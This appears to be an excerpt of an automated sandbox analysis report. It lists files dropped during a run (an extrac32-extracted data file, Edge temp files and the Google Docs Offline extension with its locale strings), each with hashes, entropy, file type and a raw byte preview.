                                                                                                                                                                                                                                                                                    Preview:j.o.q.6...Ee.2..>*.?.v}.....}U.5..I{(.....".;f|......dz.v....U@..T..<....Z6UK......f...k.....z0....w...1[.UnZ8..'T..x16.K.u.C..[...`........(....K.v..!jz..Y..........B.F.v1.ag..-1.E./ptx.2......H./..x....A.F.......[..r..`........^r=.P0{..j.+.i6.%.`dN.N..f.....X...I.;....C.VfRw^...o..~@.I.~[U0.......OQE.8X.;...1...._x.j.q".e...fo.0O.H.h.......u...........^r6.*S..&.Xl..U.fk........T.....X.V8k.?][h 6.vce...AC=LJ.....1n.:.I.j..7..dYm.-0......eI..=/.R...d...8..2..~.1+.u.GM..z.Yh......>..t...5.>.C....$......g.Z....|.GL.....A....h=d&..T.m\d7.......COe..=Q|.VkSwY..F.g.rG^..u..i...[[N......%?z..4..\Fje.....i.G.h@..xP...e.Z....l.6..O..P1....._..;.~\z..K....W1.....7........S..y...^.2F.O..>..F...6=b|..*p/.....-^9..IzF.N.t....T..~.....tr....=8....o.2N......o.y~......o......$........f..be..D......I"i.SX...U~V.{..'K5......Q!.L....D.U..L.'..Q6...g4.scb.]..7D>; L.cg......">.Q.oF..A.....@,VE...........v7%{..8...X..W....WM......F...N..#..........~.6

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Widescreen

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):53248
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.541710327002043
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:ZjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubb1/D7:ZnueoMmOqDoioO5bLezW9FfTut/D7
                                                                                                                                                                                                                                                                                    MD5:B5A9A0E7149D9A61C2C243AFB592EC65
                                                                                                                                                                                                                                                                                    SHA1:BAC9564EC168A8D8325C03AD298D4BD1187709A0
                                                                                                                                                                                                                                                                                    SHA-256:F88E95FF97C36F3FD38E44E09055D24BFD452A0FE5FFEDF9559EED76CC70AD00
                                                                                                                                                                                                                                                                                    SHA-512:5309E3B7CF1866B3808FC1E4B5203DFF8781F2745B3D679562CDE5A2102604AAA6E4B08143BE892FF01634A6DC52D45F2B0082ECEA798591BCCD22E1A0CCF738
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.......f.........qL.....f.3...............................qL.....3......................f.........rL.....f.3...0.....8.....4......f...F.......f...pL...\.....`...3.j.Z..X....j.....l.....qL......3............................f.........qL.....f.3.....................................qL.....3.......................f.........qL....f.3.......................f.........qL....f... .....$...Y3...(.....<.....qL..j.Yj...3...H.....P.....L.....d.....rL..Yj...3...p.....x.....t....}..4rL..Y..3..E......}..]....f..}.....f.3..E......}.]...M..E.E..*...}.3.j;._.3.G....G..G._.M.V.s...f9.t..M.V.e...f98t.F..}.j.[........Vj..u..M......M.V.8...j;Yf9.u.F.M.Vj......E..t#.p.V.M......f.8*u.SV.M.._.....3...3.O.........E.f9.tJ.u.P.....YY..t..E...(...j..E.Yy..$k.(........G.9_.u.j.Y.O...........G...y.3...M...'.._^..[....U....S.].VW.C...........$..H........^...M...V.....V.rk..Y......3.M...........;.u....mP...F......>.....u...;.SP...f...F......>.}..;....;....;....u....]..&P...E....F......Q...

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\b59ecd3e-9a1a-4101-9857-d975fa9794e7.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\b6d3b95a-8d91-4bdf-9c60-002462673cc4.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2110
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.402299446924969
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rrl:8e2Fa116uCntc5toYCFNM
                                                                                                                                                                                                                                                                                    MD5:1C6EF392C2A385B26FE30B1A73F077EE
                                                                                                                                                                                                                                                                                    SHA1:6B02059F982A13451CF0713317FE4343698A6199
                                                                                                                                                                                                                                                                                    SHA-256:8C13E31B28CBD8E358D7A42103C34018653690B849866FB0DE509EDEE4375E29
                                                                                                                                                                                                                                                                                    SHA-512:13E090C9F30BD83D6B5A988B6189CF55154260A81F660AC413C5A17A40A01CEF42E55BEAA7C0951276AF54EF73B194A471B00071B82AAB811D1F0777DB8B7EB7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\0590af6b-c963-40f2-a8ee-126979d65b1e.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):154477
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                    MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                    SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                    SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                    SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4982
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                    MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                    SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                    SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                    SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):908
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                    MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                    SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                    SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                    SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1285
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                    MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                    SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                    SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                    SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1244
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                    MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                    SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                    SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                    SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                    MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                    SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                    SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                    SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3107
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                    MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                    SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                    SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                    SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1389
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                    MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                    SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                    SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                    SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1763
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                    MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                    SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                    SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                    SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                    Malicious:false
